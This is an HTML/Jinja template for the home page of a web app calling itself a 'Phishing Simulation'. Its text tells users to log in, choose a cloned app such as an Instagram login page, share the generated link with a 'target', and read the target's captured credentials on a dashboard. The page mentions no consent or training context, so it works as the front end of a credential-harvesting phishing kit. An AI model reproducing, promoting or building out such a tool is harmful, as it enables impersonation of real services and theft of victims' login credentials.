<!DOCTYPE html>
<html>
  <meta name="viewport" content="width=device-width,initial-scale=1"/>
<head>
<title>Phishing</title>
<link rel='stylesheet' type="text/css" href="static/nav.css">
<link rel="icon" type="image/x-icon" href="{{ url_for('static', filename='favicon.png')}}">
<script src="/static/nav.js"></script>
</head>




<body style="background-color: pink;">


<div class="topnav" style="margin:auto;">

  <a class="active" href="#home">Home</a>
  <a href="/apps">Apps</a>
  <a  href="/dashboard">Dashboard</a>
   
  <div>
    <input type="submit" id="login_button" 
      style="background-color: bisque;
      float: right; cursor: pointer;"
      {% if isLogged == True %} value={{uid}}
      onclick="see_user()"
      {% else %}
      value="Login" onclick="login()"
      {% endif %}></input>

      <input type="submit"
      {% if isLogged == True %} value="Logout"
      style="float: right; cursor: pointer;"
      onclick="logout()"
      {% else %}
      style="display: none;"
      {% endif %}>
    </input>
</div>


</div>

 <center style=" color: rgb(43, 15, 126); margin:auto;">
  <h2 >Welcome to Phishing Simulation</h2>
</center>

<div style="display: inline-flex;">
<h3 style="float: left;">This WebApp is capable to make a Phishing page for you.   Like this ->
<br>
<br>
You just have to <a href="/login">Login</a>  and go-to <a href="/apps">Apps</a> section.
<br>
<br>
Choose the app and share the generated link to target.
<br>
<br>

You Can see the the Credential of target in <a href="/dashboard">Dashboard</a>
</h3>
<img src="/static/instagram/insta_demo.PNG" alt="insta demo" onclick="window.open('/instagram.com','_self');" width="150" height="180" style=" float: right; cursor: pointer;">

</div>
<footer style="position: fixed;text-align: center;margin-right: 50px; bottom: 0; width: 100%; border: 5px solid rgb(36, 156, 186);">
<h2>Contact Us</h2>
 </footer>
</body>
</html>





